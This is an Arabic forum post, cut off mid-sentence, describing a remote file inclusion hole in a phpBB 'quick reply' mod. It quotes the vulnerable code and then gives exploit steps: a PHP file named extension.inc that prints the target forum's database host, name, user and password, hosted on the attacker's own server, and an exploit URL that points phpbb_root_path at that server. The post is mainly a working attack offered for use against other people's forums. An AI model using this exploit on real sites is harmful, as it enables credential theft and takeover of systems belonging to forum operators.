ثغرة خطيرة في هاك الرد السريع تعرض لك أسم المستخدم وكلمة المرور لقاعدة البيانات
عند تركيبك لهاك الرد السريع (عوذ بالله من هالهاك حتى هاكات المنتدى فيها ثغرات خطيرة )
ستجد هذا الكود
دقق جيدا بهذا الكودكود:if ( $mode == 'smilies' ) { define('IN_PHPBB', true); include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); include($phpbb_root_path . 'includes/functions_post.'.$phpEx); generate_smilies('window', PAGE_POSTING); exit; }
ثم أنشاء ملف جديد سمه extension.inc
وضع داخلها مثلا
يمكنك وض الخيارات التي تود مشاهدتها من الهاككود:<?php include('config'.'.php'); echo "DB Type: $dbms <br>"; echo "DB Host: $dbhost <br>"; echo "DB Name: $dbname <br>"; echo "DB User: $dbuser <br>"; echo "DB Pass: $dbpasswd <br>"; exit; ?>
الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي
أتجه الى هذا العنوان
URL: http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles
بسهولة أستبدل
[phpBB_Forum]
بعنوان المنتدى ا
